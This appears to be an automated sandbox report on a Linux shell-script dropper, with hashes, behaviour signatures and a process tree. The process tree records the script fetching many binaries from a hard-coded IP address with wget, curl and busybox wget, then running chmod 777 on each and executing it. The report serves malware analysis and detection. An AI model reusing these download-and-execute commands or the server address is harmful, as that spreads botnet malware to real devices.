Analysis
-
max time kernel
93s -
max time network
92s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
-
Size
10KB
-
MD5
9a652a59ec3ea4f4b578b2c9f0e9c25c
-
SHA1
8c2b441f097c1f3c910ef9adb5b6816ddd60213b
-
SHA256
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19
-
SHA512
c68e93af48af16ba88fb94f6a8a874da524ac9fd19cb25abf57ac44b802ad1c202783ccdaca8d1876e6b4fcbec0b9f2080c1b06d78f60845281d78bb3b2b2216
-
SSDEEP
192:g3P87X+A6ZsXTqpx+PiAX0kvXTqpx73P87X6M0kXf:eA0YP5/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 931 chmod 889 chmod 907 chmod 925 chmod 937 chmod 949 chmod 733 chmod 844 chmod 865 chmod 871 chmod 895 chmod 967 chmod 802 chmod 822 chmod 943 chmod 961 chmod 859 chmod 913 chmod 901 chmod 955 chmod 795 chmod 877 chmod 919 chmod 754 chmod 853 chmod 973 chmod 739 chmod 883 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 734 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 740 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 755 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 797 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 803 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 823 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 845 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 854 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 860 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 866 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 872 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 878 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 884 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 890 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 896 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 902 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 908 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 914 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 920 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 926 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 932 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 938 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 944 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 950 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 956 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 962 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 968 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 974 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl
Processes
-
/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:731
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:738
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:748
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:792
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:801
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:817
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:841
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:852
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:858
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:864
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:870
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:876
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:882
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:888
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:894
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:900
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:906
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:912
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:918
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:924
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:930
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:931
-
-
